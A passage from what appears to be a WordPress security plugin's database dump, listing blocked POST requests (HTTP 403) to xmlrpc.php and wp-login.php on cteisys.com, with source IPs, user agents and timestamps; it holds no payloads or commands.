Firefox\\/96\"}','PvWbJr4G9gkx3pAhEF2mXzCI',0,1665294956.4152,15884,'','POST',403,0,515,0,1,'',0),('15.235.168.187',267102395,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HjCdz1T2qkMAEXr6shiuYl4v',0,1665294309.3860,576,'','POST',403,0,515,0,1,'',0),('159.69.8.8',2672101384,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','IVLE4leN3J6nW9ZTMgs87Bxb',0,1665294299.1655,1373,'','POST',403,0,600,0,1,'',0),('103.145.50.127',1737568895,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','y4cFiqewRY2dhXnJgGtO0C5P',0,1665294262.7193,18463,'','POST',403,0,515,0,1,'',0),('192.99.34.140',3227722380,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Uy3pTMLIk8x0c5v4qWYhQ2gA',0,1665293617.6154,18953,'','POST',403,0,515,0,1,'',0),('8.218.143.243',148541427,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pxEt7WzsOCMFlZLPJ3KQ5wVf',0,1665292957.9568,517,'','POST',403,0,515,0,1,'',0),('47.106.201.134',795527558,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pg7myEV1srtn46GacbIeqd9B',0,1665292931.3395,18928,'','POST',403,0,515,0,1,'',0),('103.116.16.173',1735659693,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','azKYDv0LlWopR3H9wENsX1uc',0,1665292298.1058,1267,'','POST',403,0,515,0,1,'',0),('148.72.211.177',2487800753,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ke46Lb5aEUmBWHZtvKfF8DGM',0,1665292275.1922,3331,'','POST',403,0,515,0,1,'',0),('185.2.5.31',3103917343,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','7wQa1FJ4b0RPBGsrEKg2dj9t',0,1665292260.1757,17939,'','POST',403,0,600,0,1,'',0),('159.65.149.229',2671875557,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TYus3j2lLR504QfHMwXEgGCW',0,1665291668.9062,1478,'','POST',403,0,515,0,1,'',0),('49.128.186.91',830519899,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','iWV2P8xymNYpGXcUoOCJ3Lz6',0,1665291605.3336,6011,'','POST',403,0,515,0,1,'',0),('13.234.117.78',233469262,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ChAS0qe2om4apIwLv16zfn38',0,1665298616.4211,569,'','POST',403,0,515,0,1,'',0),('159.65.200.228',2671888612,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','Yma75uHxwbE21AlcIgQfp3dN',0,1665298339.3523,1168,'','POST',403,0,600,0,1,'',0),('198.12.254.32',3322740256,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bkjve486QO9LsIESpVHAo1FX',0,1665298597.8743,18413,'','POST',403,0,515,0,1,'',0),('178.62.110.145',2990435985,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SlMCV6pcGt1RXEoKgYJN4DHw',0,1665298295.6316,1556,'','POST',403,0,515,0,1,'',0),('74.208.103.228',1255172068,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vy35dT4UrKjqHQi6zaIVLN7X',0,1665297986.2828,508,'','POST',403,0,515,0,1,'',0),('104.248.241.28',1761145116,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','EVXP3Fjz52mxrOBpeW6GvodN',0,1665297984.1390,1368,'','POST',403,0,515,0,1,'',0),('81.88.53.17',1364735249,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MDu9zJBhla4GnF27we56pWYf',0,1665297675.9531,17784,'','POST',403,0,515,0,1,'',0),('81.95.96.180',1365205172,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NROAxlYzQELF25VypaPdhS41',0,1665297684.8411,8919,'','POST',403,0,515,0,1,'',0),('41.93.82.7',693981703,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TdAS6kHjrxDVYNJvbOzRBmqZ',0,1665297360.8732,1471,'','POST',403,0,515,0,1,'',0),('107.189.14.89',1807552089,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/42.0.2311.90 Safari\\/537.36\",\"2\":\"http:\\/\\/www.google.com.hk\"}','tcs7plvRyijAXWNmdBUP03aI',0,1665297220.6487,10368,'','POST',403,0,515,0,1,'',0),('69.89.27.23',1163467543,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SQLqwTEzN17PGWjXtobplRn9',0,1665297049.3467,1212,'','POST',403,0,515,0,1,'',0),('75.119.157.181',1266130357,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','l39eaHuTJFBjnGPg8IZtvs6O',0,1665296320.0913,17562,'','POST',403,0,600,0,1,'',0),('119.18.49.12',1997680908,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4r2IJFgnLa70l1DvqucmXB9Z',0,1665296363.4228,1620,'','POST',403,0,515,0,1,'',0),('194.233.69.10',3270067466,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dyEs0gHeDraoBi6UcvjIht1Y',0,1665297005.3114,19344,'','POST',403,0,515,0,1,'',0),('13.237.121.70',233666886,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hSUlFV6YkjIZNfvE4bBaqKs5',0,1665295910.7095,1660,'','POST',403,0,515,0,1,'',0),('69.89.27.23',1163467543,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VqxRCc3vpB7YFSamsrnJGHN0',0,1665295892.9609,18908,'','POST',403,0,515,0,1,'',0),('193.176.230.188',3249596092,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AbPx8q6R1jHYdryWk2uKGiop',0,1665295458.8133,16364,'','POST',403,0,515,0,1,'',0),('143.110.137.82',2406386002,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4BZRukXDp2mvFjxlo953JiQr',0,1665295463.2082,11965,'','POST',403,0,515,0,1,'',0),('143.244.162.250',2415174394,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nXoPZpfLOlv5ckisMHj0xKwd',0,1665305926.3091,9092,'','POST',403,0,515,0,1,'',0),('167.172.79.125',2813087613,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XS8HxgZNRGkanmEhPt3irLod',0,1665302207.0861,1461,'','POST',403,0,515,0,1,'',0),('164.92.66.133',2757509765,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5csAekZIEia4QXKdWMn0OzBr',0,1665301926.2635,1242,'','POST',403,0,515,0,1,'',0),('190.107.177.243',3194728947,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','u7JHpLs6SNGOef2oCYPMmQFX',0,1665301640.8073,2287,'','POST',403,0,515,0,1,'',0),('184.168.121.5',3098048773,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JMgA7Ejmnwfu1Z3ysP4ohLtb',0,1665301125.7561,13120,'','POST',403,0,515,0,1,'',0),('107.180.103.185',1806985145,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GwUc9tj5vmBCqShLD4lzPH0i',0,1665301641.4092,1125,'','POST',403,0,515,0,1,'',0),('80.77.135.125',1347258237,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','yDC70sIogwmYSM2bx3HPdflj',0,1665301119.8273,19048,'','POST',403,0,515,0,1,'',0),('101.99.90.175',1701010095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XZzCVcG45k6fFKoehd37EtO8',0,1665300823.3382,470,'','POST',403,0,515,0,1,'',0),('104.248.241.28',1761145116,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','j9Z8YCt1V6dzovLe5ERhJ0HO',0,1665300808.9215,2261,'','POST',403,0,515,0,1,'',0),('118.98.64.188',1986150588,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Uz3MYbvmurA6LDQSswft9IOo',0,1665300498.3462,1597,'','POST',403,0,515,0,1,'',0),('159.89.164.128',2673452160,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 Safari\\/537.36\"}','m4Te8bgFN1IYSlMuKoL9sVxE',0,1665300371.5204,1333,'','POST',403,0,600,0,1,'',0),('23.175.146.178',397382322,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','knvRM6AFgwyIfZJpe3KUPqV9',0,1665300221.8790,506,'','POST',403,0,515,0,1,'',0),('171.244.16.103',2884898919,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VmJvR7ehNOL4lydxjb5BIG9u',0,1665300199.2828,1242,'','POST',403,0,515,0,1,'',0),('40.70.241.53',675737909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6uqUgNrOAecSvwPF5jdb1hsB',0,1665299888.4726,19764,'','POST',403,0,515,0,1,'',0),('162.14.71.142',2718844814,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2X0IQL3AchfBxvJwVUto6NCG',0,1665299544.1934,17298,'','POST',403,0,515,0,1,'',0),('104.45.41.45',1747790125,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5PJMWarTO8G0qmfR3zdly2SA',0,1665299225.5151,657,'','POST',403,0,515,0,1,'',0),('103.152.164.103',1738056807,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OwdaSE2bWgP6FnBxCHe58fQR',0,1665299219.1493,6276,'','POST',403,0,515,0,1,'',0),('213.152.162.10',3583549962,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','oGfDysYq3dSIVXAcelxkUTwh',0,1665299065.8068,18443,'','POST',403,0,515,0,1,'',0),('31.184.242.14',532214286,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','eVQ9vxkHI8bAaoMfYrGnXP26',0,1665298921.2429,612,'','POST',403,0,515,0,1,'',0),('177.52.160.29',2973016093,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qGWElgrMTo9AdNV0h7CDiZFQ',0,1665298901.7020,19499,'','POST',403,0,515,0,1,'',0),('72.29.76.78',1209879630,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pjLWVcyiG5TrnbXEQfsvZ9oC',0,1665305917.8407,17495,'','POST',403,0,515,0,1,'',0),('51.210.99.98',869426018,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8qnWLOwPl6E2GjASxsp3KcC1',0,1665305593.5888,530,'','POST',403,0,515,0,1,'',0),('157.0.140.186',2634058938,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GQaS7ZUNhW6Fzp1nOwvbEIji',0,1665305258.2990,534,'','POST',403,0,515,0,1,'',0),('158.255.80.210',2667532498,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mJ9K4bct1wrDRdPOlnM2qkYu',0,1665305581.9364,2622,'','POST',403,0,515,0,1,'',0),('47.57.186.73',792312393,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','uWZsVO6PrcqT2pD8C0UijgRk',0,1665305229.2642,18893,'','POST',403,0,515,0,1,'',0),('95.111.225.89',1601167705,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Id896rY5C02vmPpbJO34GNfx',0,1665304612.3441,8550,'','POST',403,0,515,0,1,'',0),('124.158.12.83',2090732627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FDOKZRHqmok0vrlWIx3yhtLz',0,1665304916.0134,18282,'','POST',403,0,515,0,1,'',0),('50.87.248.38',844625958,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FV0KtzLUa5WsoSnl6h9i48Hp',0,1665304602.7990,17997,'','POST',403,0,515,0,1,'',0),('47.111.116.44',795833388,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','6X9F1VamJGCdrcketAfQSbD2',0,1665304350.4378,702,'','POST',403,0,600,0,1,'',0),('213.152.161.244',3583549940,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','xdSjOsI5YhBJUWy837Fcno1E',0,1665304123.7191,1513,'','POST',403,0,515,0,1,'',0),('151.106.35.235',2540315627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GlxDs3tAi6SZy25hUrYkRnPV',0,1665304295.4761,17506,'','POST',403,0,515,0,1,'',0),('172.105.42.19',2892573203,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CkU6QSciW2TjRKYLeXp34ghB',0,1665303978.2727,19859,'','POST',403,0,515,0,1,'',0),('68.183.15.215',1152847831,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VTDIPg0ulQshJGp6edjXN3oS',0,1665303987.1471,10985,'','POST',403,0,515,0,1,'',0),('167.71.63.47',2806464303,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qlUtWKfpiOXDkSeE24sPQNLr',0,1665303688.0655,569,'','POST',403,0,515,0,1,'',0),('177.52.160.29',2973016093,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YMPfwhXNxKV5mBzG4cQi81Ij',0,1665303674.2575,1673,'','POST',403,0,515,0,1,'',0),('194.242.56.232',3270654184,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jVNirak9Zhyn30JgvdEtwTlz',0,1665303379.3521,14085,'','POST',403,0,515,0,1,'',0),('118.98.64.188',1986150588,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1KVmrwzEl7s6BS0GH5Q2U8De',0,1665303373.2534,20173,'','POST',403,0,515,0,1,'',0),('66.94.117.33',1113486625,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FxG63JSX0jOgowZrzkeu7LvQ',0,1665303083.4804,17832,'','POST',403,0,515,0,1,'',0),('116.62.49.96',1950232928,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jKEtHr3aTm0nsYdolV46I7FG',0,1665303087.0731,14196,'','POST',403,0,515,0,1,'',0),('159.65.219.142',2671893390,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','v43eGmF5ukPyxhLWlAsMz1a2',0,1665302815.4932,2606,'','POST',403,0,515,0,1,'',0),('158.69.26.40',2655328808,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jNiZRJkMwoe8SOPuYd6bDgq7',0,1665302799.2264,18744,'','POST',403,0,515,0,1,'',0),('130.61.143.194',2185072578,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4txMLuWvXbN0IYeiT5Hf7nrO',0,1665302519.2573,19349,'','POST',403,0,515,0,1,'',0),('109.233.192.83',1844035667,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qTG15MxysreuYknEazljB7Xm',0,1665309577.4163,14280,'','POST',403,0,515,0,1,'',0),('178.128.209.28',2994786588,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HgUrd0WBbCtMLm7ojZfk2exS',0,1665309574.9213,16645,'','POST',403,0,515,0,1,'',0),('131.72.236.73',2202594377,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gkISLQmMJzp9d7V3sj8hXYAe',0,1665309194.5924,494,'','POST',403,0,515,0,1,'',0),('207.55.255.20',3476553492,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fNG6vFYXDVWgR4iCAQM3ZyjU',0,1665309192.4887,1383,'','POST',403,0,515,0,1,'',0),('64.42.179.43',1076540203,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vHizFNTGS5bMe3uYmXnLK2Vo',0,1665308803.1610,18673,'','POST',403,0,515,0,1,'',0),('64.235.231.20',1089201940,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','13xfGOac2yNDM86CLEePpSWQ',0,1665308478.8915,520,'','POST',403,0,515,0,1,'',0),('216.245.215.122',3639990138,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qTimPDuEFknYb6lrvtheQI2W',0,1665308449.9133,2474,'','POST',403,0,515,0,1,'',0),('94.231.86.20',1592219156,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','U0o5cHWnExT4FyYBLjVN2wqA',0,1665308298.6444,1307,'','POST',403,0,600,0,1,'',0),('217.174.248.107',3652122731,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nX0Tj8BSCMLqcmwNKtHW5sdl',0,1665308078.8432,2402,'','POST',403,0,515,0,1,'',0),('199.188.207.230',3351039974,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fGgWwYiks20NJlDobn1QjT8x',0,1665308062.4653,18779,'','POST',403,0,515,0,1,'',0),('194.59.165.88',3258688856,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ejfETHC3i5Nh1nXSZQsOU97u',0,1665307691.1549,18594,'','POST',403,0,515,0,1,'',0),('167.172.79.125',2813087613,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7Aj3qWX6TH50RuavhcrxJSFP',0,1665307707.3453,2399,'','POST',403,0,515,0,1,'',0),('178.128.209.28',2994786588,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OoL0VEBR2eTq3tgDNcupWyP9',0,1665307329.2566,18866,'','POST',403,0,515,0,1,'',0),('139.59.117.30',2335929630,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Bnb76J0uKOq9GF4iVpySQ8Ic',0,1665307341.8322,6361,'','POST',403,0,515,0,1,'',0),('143.198.161.19',2412159251,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VwqhtuYryn4I5M2gW0jQOFR8',0,1665306991.6466,571,'','POST',403,0,515,0,1,'',0),('165.232.183.66',2783491906,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bsYaivCKkzZuS8D3OftwF1jR',0,1665306970.5756,18775,'','POST',403,0,515,0,1,'',0),('162.241.115.107',2733732715,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','B1PH5Ct8FEz2lZXbuyqRJQdI',0,1665306623.2321,18422,'','POST',403,0,515,0,1,'',0),('167.99.54.31',2808296991,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MKuisAj2nB6aeX7fE81vbcYG',0,1665306636.4721,5174,'','POST',403,0,515,0,1,'',0),('81.68.87.46',1363433262,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5HwgR4sTxrkqodzXbI3Ku7Ml',0,1665306261.5743,18707,'','POST',403,0,515,0,1,'',0),('103.8.25.74',1728584010,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3pEH1nJP4jL7TGBiMrdcDzUm',0,1665313477.7073,15064,'','POST',403,0,515,0,1,'',0),('110.40.244.196',1848177860,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 